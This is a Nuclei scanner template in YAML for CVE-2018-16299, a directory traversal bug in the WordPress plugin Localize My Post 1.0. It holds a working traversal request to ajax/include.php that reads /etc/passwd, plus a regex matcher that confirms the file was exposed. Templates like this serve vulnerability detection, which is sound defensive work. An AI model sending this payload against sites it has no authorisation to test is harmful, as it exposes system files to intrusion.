32 lines
822 B
YAML
32 lines
822 B
YAML
id: CVE-2018-16299
|
|
|
|
info:
|
|
name: WordPress Plugin Localize My Post 1.0 - LFI
|
|
author: 0x_Akoko,0x240x23elu
|
|
severity: high
|
|
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/45439
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-16299
|
|
cwe-id: CWE-22
|
|
tags: wordpress,cve2018,cve,lfi,plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|